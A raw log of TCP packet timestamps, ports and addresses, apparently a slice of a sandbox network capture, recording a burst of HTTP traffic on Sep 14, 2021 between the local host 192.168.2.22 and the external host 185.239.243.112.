Sep 14, 2021 13:16:21.817790031 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817831993 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.817835093 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.817841053 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.818593025 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819142103 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819196939 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819238901 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819261074 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819271088 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819278002 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819315910 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819319010 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819319963 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819359064 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819387913 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819400072 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819438934 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819442034 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819446087 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819483995 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819474936 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819525957 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819564104 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819566011 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819571972 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819600105 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819633961 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819653988 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819658995 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819673061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819674015 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819714069 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819751978 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819756985 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819776058 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819818974 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819856882 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819858074 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819863081 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819896936 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819902897 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819935083 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819971085 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.819988966 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.819993973 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820009947 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820049047 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820051908 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820059061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820080996 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820105076 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820144892 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820177078 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820182085 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820183992 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820219994 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820255995 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820260048 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820264101 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820317984 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820357084 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820377111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820383072 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820394039 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820430040 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.820449114 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820452929 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820899963 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.820909977 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845165968 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845427990 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845546961 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845578909 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845604897 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845629930 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845630884 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845634937 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845658064 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845684052 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845690012 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845845938 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.845889091 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.845896959 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.848901033 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.848943949 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.848968983 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.848994970 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849010944 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849019051 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849026918 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849030018 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849045038 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849071026 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849081039 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849087954 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849097967 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849123955 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849128008 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849132061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849148035 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849173069 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849179983 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849206924 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849214077 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849219084 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849235058 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849263906 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849267960 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849272013 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849292040 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849318981 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849323988 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849328995 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849347115 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849375010 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849378109 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849381924 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849402905 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849431992 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849435091 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849438906 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849458933 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849487066 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849492073 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849495888 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849514961 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849541903 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849545956 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849550009 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849570036 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849596977 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849602938 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849608898 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849626064 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849656105 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849658966 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849663973 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849683046 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849709988 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849716902 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849720955 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849740028 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849767923 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849776983 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849782944 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849797010 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849824905 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849829912 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849834919 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849855900 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849886894 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849886894 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849890947 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849940062 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849971056 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.849973917 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.849978924 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850003004 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.850033998 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.850039005 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850043058 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850075960 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.850106955 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.850109100 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850112915 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850336075 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.850343943 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873507977 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873557091 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873593092 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873603106 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873621941 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873624086 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873648882 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873651028 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873658895 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873675108 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873702049 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873708010 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873713970 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873728037 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873754978 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873775005 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873778105 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873781919 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873809099 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873823881 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873827934 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873836040 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873862982 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873878956 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873878956 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873883963 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873917103 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873939037 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873940945 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873955965 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.873970985 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.873975992 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874001026 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874032021 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874059916 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874063015 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874073982 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874083042 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874093056 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874103069 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874124050 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874154091 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874164104 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874169111 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874185085 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874211073 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874232054 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874237061 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874245882 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874279022 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874284983 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874289989 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874309063 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874340057 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874350071 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874356031 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874371052 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874401093 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874412060 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874417067 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874432087 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874463081 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874469042 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874474049 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874495029 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874525070 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874532938 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874538898 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874555111 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874584913 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874596119 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874602079 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874634981 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874643087 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874670029 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874695063 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874711990 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874718904 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874718904 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874722958 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874744892 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874763966 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874768019 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874785900 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874803066 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874830008 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874842882 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874850035 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874855995 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874883890 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874898911 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874902964 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874911070 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874936104 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874953985 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874959946 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.874963999 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.874993086 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875000954 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875005960 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875020981 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875049114 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875060081 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875063896 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875073910 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875101089 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875113010 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875123024 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875150919 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875176907 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875190020 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875195980 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875207901 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875236034 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.875243902 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875248909 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.875736952 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878127098 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878165960 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878192902 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878220081 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878247023 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878248930 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878271103 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878274918 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878274918 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878284931 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878312111 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878320932 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878340960 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878367901 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878379107 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878382921 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878392935 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878418922 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878429890 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878434896 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878447056 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878473043 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878484011 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878490925 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878499985 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878525972 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878534079 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878540039 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878552914 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878578901 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878592968 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878597975 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878604889 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878632069 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878640890 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878645897 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878658056 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878684044 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878695965 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878700018 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878710985 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878736973 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878753901 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878757000 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878765106 CEST	49165	80	192.168.2.22	185.239.243.112
Sep 14, 2021 13:16:21.878777027 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878794909 CEST	80	49165	185.239.243.112	192.168.2.22
Sep 14, 2021 13:16:21.878829956 CEST	80	49165	185.239.243.112	192.168.2.22
